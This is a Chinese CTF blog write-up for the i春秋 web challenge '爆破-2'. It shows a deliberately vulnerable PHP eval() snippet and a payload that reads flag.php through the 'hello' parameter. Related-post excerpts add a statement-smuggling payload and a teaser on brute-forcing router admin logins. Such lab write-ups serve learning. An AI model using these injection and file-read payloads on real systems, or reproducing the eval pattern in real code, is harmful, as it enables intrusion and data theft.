i春秋-web- 爆破2

最新推荐文章于 2024-05-09 01:57:05 发布
最新推荐文章于 2024-05-09 01:57:05 发布
阅读量464 收藏
点赞数
分类专栏: i春秋 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/83995216
版权

题目:flag不在变量中。

打开链接:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

找了许多题解都是构造payload,知识有限,对payload不了解。如下:

http://bcc9f1f0ae4a4c1c990aff308f30cf606a2e804b655d4f0a.game.ichunqiu.com/?hello=file_get_contents('flag.php')

file_get_contents()函数是将文件中的内容以字符串的形式读取。

页面变成

string(83) " <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

此时查看页面源代码会发现flag。

大千SS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web入门-爆破
wo41ge的博客
11-09 496
web-21 进入题目链接 下载附件 拖进winhex 文件头开头 504B0304, 是压缩包文件头。 进行改后缀 给了一个字典
基于ANSYS LS-DYNA的台阶爆破超深的影响因素分析.pdf
05-24
利用ansys中的 ls-dyna模块来对 岩石爆破数值进行模拟分析,分析了不同孔径以及不同孔径深度对爆破效果的影响。
i春秋CTF训练 Misc Web 爆破-2
椰奶冻不安全的博客
06-20 583
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:flag不在变量中。 链接需到ichunqiu网站申请 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.
【谨慎学习】手把手教你破解网站管理后台帐号密码_运营管理后台密码(1)
最新发布
2401_84862061的博客
05-09 890
在上面的讲解中,我们已经学会了如何去获得后台的相关登录界面信息,接下来我们开始对获得的登录界面进行攻击操作,在此为了方便演示我们将以爆破路由器的后台管理界面为例,在执行下面的操作时,因为要使用 burpsuite 工具,所以我们需要安装一个Kali系统(可以使用虚拟机安装),具体安装过程这里不论述,请读者自行下载安装。在上面的情况中,因为ID和密码都是正确的,所以我们很轻松的就获得了这些信息,那么如果管理员输入的账户ID 是正确的而密码是错误的,我们又应该怎么操作呢?
i春秋-web-爆破-2
a3uRa的一个窝
08-28 701
include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 传入hello=file(‘flag.php’) hello=1);print_r(file(‘flag.php’));var_dump(1 hello=1);print_r(file(‘flag.php’)...
i春秋 web爆破3
qq_41306131的博客
04-05 675
先放题目代码讲解 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } i...
i春秋-web-爆破-1
Sea_Sand息禅
11-12 698
题目内容:flag就在某六位变量中。 题目 include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹配包括下划线的任何单词字符,等价于'[A-Za-z0-9_]'。*号:匹配前面的子表达式零次或多次。 die('ERROR'); } eva...
行业分类-设备装置-爆破作业智能服务平台.zip
08-23
2. **远程审批**:提供在线审批流程,简化手续,提高审批效率,同时实现对爆破作业全程的合法性和合规性审查。 3. **实时监控**:运用物联网技术,实时收集爆破现场的各类数据,如环境参数、设备状态等,及时预警...
行业分类-设备装置-爆破作业智能服务平台及平台智能监控爆破作业的方法.zip
08-23
爆破作业智能服务平台及平台智能监控爆破作业的方法》 在现代工程领域,尤其是在矿山开采、建筑拆除、公路建设等大规模土木工程中,爆破作业是必不可少的关键环节。然而,爆破作业的安全性和效率一直是一大挑战。...
web安全爆破字典bp.txt
10-28
web安全-抓包字典
cpp-RDP3389爆破防护
08-16
RDP(3389)爆破防护
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
WEB爆破
zip471642048的博客
01-05 546
web21 用他给的字典burp爆破
i春秋broken
weixin_30701575的博客
09-11 336
点开一个附带超链接的网页,直接点击file跳转到broken网页 网页里面是一个jsfuck代码 Jsfuck代码的执行方法 ①复制 ②打开firefox浏览器 ③按下F12 ④选择上方的控制台 ⑤在下方粘贴是jsfuck代码 ⑥按下回车即可运行 这里有一篇jsfuck的介绍https://gitee.com/mirrors/jsfuck 亦或者直接访问http://...
i春秋Web-broken(2017第二届广东省强网杯线上赛)
Sea_Sand息禅
05-15 799
进站源码没什么东西,有个链接进去看到jsfuck编码,拿到控制台里去执行确无法执行,可能是编码出问题了。 jsfuck编码原理参考:https://github.com/aemkei/jsfuck/blob/master/jsfuck.js 网站上有编码源码,给出了各个字符的jsfuck编码形式,最后的一对括号是没有的,应该是多余的,去掉之后仍然不能成功。 最前面的应该是[],我们在第二个字...
i春秋CTF训练 Web broken
椰奶冻不安全的博客
06-30 468
Web broken 题目内容:http://106.75.72.168:1111/ you got a file, but … file指向http://106.75.72.168:1111/fffffaaakk打开页面发现jsfuck加密后的代码 复制后放进notepad++里,发现没有与第一个[对应的],在后面补一个,然后删除最后面代表function调用的(),复制放进浏览器的concole执行,得到flag ...
i春秋爆破-2 -------- 文件读取
weixin_44632787的博客
09-19 988
题目 知识点: PHP文件读取函数 利用Linux读取文件的函数 (一)PHP中文件读取的几个函数: fread fgets fgetss file readfile file_get_contents show_source 参考来源:https://www.jb51.net/article/53266.htm (二)利用Linux读取文件的函数 system exec shell_exec passthru popen 参考来源: https://bbs.ichunqiu.com/foru
i春秋WEB爆破-3 WP
小白渣的博客
12-22 402
还是首先 先看到题目,直接给出了源码,代码审计,做审计题首先是要理解代码逻辑 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_S...
web安全】密码爆破讲解,以及burp的爆破功能使用方法
2302_79590880的博客
12-16 2736
密码爆破的思路总结
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值